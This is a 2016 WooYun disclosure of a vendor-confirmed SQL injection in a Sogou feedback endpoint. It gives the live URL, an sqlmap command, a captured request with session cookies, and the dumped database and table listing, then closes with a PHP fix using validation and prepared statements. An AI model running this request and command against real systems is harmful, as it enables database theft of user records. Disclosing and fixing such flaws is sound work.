Sogou: SQL injection at one endpoint leaks 220,000 user records

Title: Sogou: SQL injection at one endpoint leaks 220,000 user records
Vendor: Sogou (搜狗)
Author: 黑色键盘丶
Submitted: 2016-05-15 10:24
Published: 2016-06-30 08:20
Type: SQL injection
Severity: High
Self-assessed rank: 20
Status: Confirmed by vendor
Tags: injection technique

Vulnerability details

Open http://fankui.help.sogou.com/index.php/web/web/index?type=6, capture the request the page sends and read it. Adding a single quote to the input produces a database error.

sqlmap command: sqlmap.py -r 1.txt --dbs

---------------- request packet (1.txt) -------

POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48 * D629; SUID=0E1649DE2208990A000000005734A933; m=45390 * EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [email protected]/* @@@@@@@@@@; YYID=45390 * EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260

shenSu%5BwebAdr%5D=HTTP%3A%2F%2Fwww.sogou.com%2F&shenSu%5Breason%5D=1&shenSu%5Bcontact%5D=313%40q.com&webContactWayType=

Database information

available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test

Tables in the current database

Database: sogou_zhanzhang
+-------------------------------+----------+
| Table                         |  Entries |
+-------------------------------+----------+
| deadlink_wap_data             | 15191050 |
| url_submit                    |   547950 |
| url_submit_view               |   547950 |
| website                       |   270697 |
| website_view                  |   270697 |
| `user`                        |   220754 |
| sitemap                       |   175918 |
| sitemap_copy                  |   175417 |
| sitemap_view                  |   168249 |
| site_name                     |    73232 |
| website_precision             |    67856 |
| site_name_view                |    65060 |
| fault_block_log               |    54773 |
| sitemap_wap                   |    52806 |
| fault_block                   |    51056 |
| sitemap_wap_view              |    48773 |
| sitemap_invitation            |    45320 |
| sitemap_invitation_view       |    43771 |
| site_icon                     |    42416 |
| site_icon_view                |    42067 |
| spider_pressure_feedback      |    31070 |
| sitemap_invitation_log        |    28583 |
| site_logo                     |    27750 |
| site_logo_view                |    25608 |
| site_name_log                 |    24155 |
| spider_pressure_feedback_view |    23755 |
| web2wap                       |    20046 |
| web2wap_view                  |    19268 |
| site_logo_log                 |    17607 |
| renzheng_log                  |    16555 |
| supply_fetch                  |    14501 |
| site_icon_log                 |    13925 |
| renzheng                      |     9324 |
| fb_updateshensu               |     5427 |
| fb_shensu                     |     5341 |
| web2wap_log                   |     4917 |
| fb_img                        |     3720 |
| redirection                   |     3696 |
| redirection_view              |     3696 |
| tb_member                     |     3682 |
| feedback                      |     3270 |
| fb_tool                       |     2906 |
| feedback_view                 |     2773 |
| url_shoulu                    |     2577 |
| umis_waitingfavicon_log       |     2568 |
| umis_waitingfavicon           |     2520 |
| site_param                    |     1992 |
| sitemap_blacklist             |     1917 |
| site_param_view               |     1825 |
| website_precision_log         |     1064 |
| user_change_log               |      968 |
| redirection_log               |      561 |
| fb_suggestion                 |      289 |
| fb_jubao                      |      201 |
| fb_record                     |      153 |
| renzheng_set                  |      106 |
| fb_kuaizhao                   |       81 |
| mail_view                     |       78 |
| backend_user                  |       74 |
| website_log                   |       63 |
| product_black_list            |       24 |
| user_invitation               |       19 |
| 通知                          |       18 |
| fb_updatetool                 |       14 |
| website_precision_maxid       |        7 |
| 专栏作家                      |        5 |
| partner_white_list            |        5 |
| mail_group                    |        1 |
| site_param_log                |        1 |
+-------------------------------+----------+

The `user` table alone holds 220754 rows, which is the 220,000 user records the title refers to.

Proof of vulnerability

Open http://fankui.help.sogou.com/index.php/web/web/index?type=6, capture the request and read it. Adding a single quote to the input produces a database error.

(The proof section repeats the same request packet, sqlmap command and database listing shown under the details above.)

Fix plan: filter the input.

Copyright notice: please credit the source. 黑色键盘丶@乌云 (WooYun)
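An added illustration of the "filter the input" fix plan, not Sogou's code: a hypothetical addShenSu handler written in the string-concatenating form the single-quote error implies, beside a version that validates the fields seen in the captured request and binds them through a prepared statement. The table columns, the allowed values for reason and webContactWayType, and the handler shape are all assumptions.

```php
<?php
// Added example, not Sogou's code. Table fb_shensu exists on the page; its
// column names (web_adr, reason, contact, contact_way_type) are assumed.

// BEFORE: the pattern the report implies. Form values are pasted into SQL,
// so a single quote in shenSu[webAdr] breaks the statement and the database
// error leaks back to the caller (the error-based behaviour reported).
function addShenSuVulnerable(mysqli $db, array $shenSu, string $wayType): bool
{
    $sql = "INSERT INTO fb_shensu (web_adr, reason, contact, contact_way_type) VALUES ('"
         . $shenSu['webAdr'] . "', '" . $shenSu['reason'] . "', '"
         . $shenSu['contact'] . "', '" . $wayType . "')";
    return (bool) $db->query($sql);
}

// AFTER: validate each field against what it is supposed to be, reject
// anything else, and let the driver bind the values. Bound parameters never
// reach the SQL parser as syntax, so quotes are stored literally.
// The PDO connection should be created with
//   PDO::ATTR_EMULATE_PREPARES => false   (server-side prepare)
//   PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION   (log, do not echo, errors)
function addShenSuSafe(PDO $db, array $shenSu, string $wayType): bool
{
    // webAdr must be a URL (the captured request sends http://www.sogou.com/)
    $webAdr = filter_var($shenSu['webAdr'] ?? '', FILTER_VALIDATE_URL);
    // reason was "1" in the capture; assumed to be a small enum code
    $reason = filter_var($shenSu['reason'] ?? '', FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1, 'max_range' => 9]]);
    $contact = trim((string) ($shenSu['contact'] ?? ''));
    // allowed contact-way types are an assumption
    $allowedWayTypes = ['', 'email', 'phone'];

    if ($webAdr === false || $reason === false
        || $contact === '' || mb_strlen($contact) > 128
        || !in_array($wayType, $allowedWayTypes, true)) {
        return false;   // reject outright rather than trying to "clean" input
    }

    $stmt = $db->prepare(
        'INSERT INTO fb_shensu (web_adr, reason, contact, contact_way_type)
         VALUES (?, ?, ?, ?)'
    );
    return $stmt->execute([$webAdr, $reason, $contact, $wayType]);
}
```

Rejecting malformed input and binding parameters removes the injection; suppressing database error output to the client additionally takes away the error-based channel sqlmap used here.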